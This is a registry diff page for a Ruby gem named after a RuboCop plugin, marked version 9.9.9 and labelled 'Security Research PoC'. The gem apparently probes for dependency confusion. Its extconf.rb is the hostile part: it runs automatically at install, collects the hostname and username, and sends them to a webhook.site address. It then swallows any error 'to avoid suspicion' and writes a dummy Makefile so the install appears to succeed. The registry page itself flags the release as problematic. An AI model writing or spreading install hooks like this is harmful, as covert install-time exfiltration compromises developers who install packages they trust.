rubocop-vintedmetrics 9.9.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of rubocop-vintedmetrics might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/extconf.rb +17 -0
  3. metadata +37 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 0df89d340aae39ddc1fa193bb5539c8ade709b13658dda3e35d4c0cb3889d53c
4
+ data.tar.gz: 03f7cd4a3fb68e8e5b87aff382acece0e7b6bf99b5f729b7d391b47fc3e39409
5
+ SHA512:
6
+ metadata.gz: fe8668e629755c5926013b91c197c7072e2702a16ed7584f5e50404b1f3a89ec06fe9dc4899e9b8057161967288b8593257d05158adde5f432b0ff865f61ec22
7
+ data.tar.gz: 78bad9e394caacad30dab55bd7c49d8e0e172064540454b742f74e931da87082e0d238fe6b6162e3af118e45a7e4131ab9eaaf07755e4cde84900ba4826b5da6
data/extconf.rb ADDED
@@ -0,0 +1,17 @@
1
+ # File: extconf.rb
2
+ require 'net/http'
3
+ require 'uri'
4
+
5
+ # The "Phone Home" - harmless metadata only
6
+ begin
7
+ target = "https://webhook.site/d4fb75cc-d3a1-4a4b-80b8-3af3c71016e0"
8
+ hostname = `hostname`.strip
9
+ user = `whoami`.strip
10
+ uri = URI.parse("http://#{target}/?host=#{hostname}&user=#{user}&source=vinted_poc")
11
+ Net::HTTP.get(uri)
12
+ rescue
13
+ # Fail silently to avoid suspicion if network is restricted
14
+ end
15
+
16
+ # Dummy Makefile to satisfy the installer
17
+ File.open('Makefile', 'w') { |f| f.write("all:\n\t@echo 'Done'\ninstall:\n\t@echo 'Done'") }
metadata ADDED
@@ -0,0 +1,37 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: rubocop-vintedmetrics
3
+ version: !ruby/object:Gem::Version
4
+ version: 9.9.9
5
+ platform: ruby
6
+ authors:
7
+ - Research
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 2026-02-20 00:00:00.000000000 Z
11
+ dependencies: []
12
+ executables: []
13
+ extensions:
14
+ - extconf.rb
15
+ extra_rdoc_files: []
16
+ files:
17
+ - extconf.rb
18
+ licenses: []
19
+ metadata: {}
20
+ rdoc_options: []
21
+ require_paths:
22
+ - lib
23
+ required_ruby_version: !ruby/object:Gem::Requirement
24
+ requirements:
25
+ - - ">="
26
+ - !ruby/object:Gem::Version
27
+ version: '0'
28
+ required_rubygems_version: !ruby/object:Gem::Requirement
29
+ requirements:
30
+ - - ">="
31
+ - !ruby/object:Gem::Version
32
+ version: '0'
33
+ requirements: []
34
+ rubygems_version: 3.6.3
35
+ specification_version: 4
36
+ summary: Security Research PoC
37
+ test_files: []